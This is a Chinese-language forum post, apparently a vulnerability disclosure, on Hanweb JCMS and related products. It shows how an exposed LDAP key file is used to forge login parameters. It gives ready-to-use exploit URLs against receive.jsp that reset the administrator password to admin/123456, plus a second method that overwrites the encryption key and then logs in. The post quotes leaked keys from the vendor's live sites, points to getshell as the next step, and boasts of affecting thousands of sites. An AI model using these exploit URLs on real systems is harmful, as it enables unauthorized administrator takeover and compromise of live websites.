第一步,大汉网络加解密说明
LDAP密钥配置文件,/interface/ldap/ldapconf.xml
获取密钥:<enckey>o3h2iB8ggnp2</enckey>
我们可以使用大汉的加解密库进行任意加解密,只要知道服务端的密钥,就可以和服务器进行通讯:
第二步,保存密钥的ldapconf.xml文件,放在了网站目录,直接可以访问:
我们拿官网,进行一下测试:
访问:http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml
拿到了密钥:<enckey>OJ9Un5JmpTfN0gJx</enckey>
第三步,通过密钥: OJ9Un5JmpTfN0gJx,我们构造如下几个密文:
第四步,覆盖管理员密码为:admin - 123456
漏洞EXP:
http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2V1Z3UdA2sNaw==&loginpass=DEIBRXBGcUQOM3g0
直接登录,自动跳转到登录后台,进入后台Getshell的文章很多啦:
漏洞分析:
源码分析:
新的姿势:
上面提交的重置管理员密码漏洞,是因为ldap密钥泄漏。
/interface/ldap/ldapconf.xml,直接放到了网站目录中,可以直接访问。
我在对官方demo最新版本的测试中,/interface/ldap/ldapconf.xml是无法访问的。
这样就看不到明文的密钥了,所以无法重置管理员密码了。
官方demo:http://demo.hanweb.com/jcms/
于是我又深入分析了一下,/interface/ldap/receive.jsp这个组件,发现一个惊喜。
原来这个xml的配置文件,是可以覆盖的,所以构造EXP:
http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=S&enckey=key888
漏洞EXP:
http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=BWcCb3FrBBh8bQ==&loginpass=BWcCb3FrBBh8bQ==
再一次,成功登陆:
影响范围:
通过上面两种姿势,新旧版本全系统全版本保证通杀,包括:jcms,jact,jsearch,vipchat,vc,xxgk等等。
轻轻松松几千个站点,上面已经列了一些,不够的话我补充。
!申请加精!
密钥、LDAP、加密解密、编程、案例、通杀、两种姿势、两个官网验证、源码分析,漏洞分析!
!申请加精!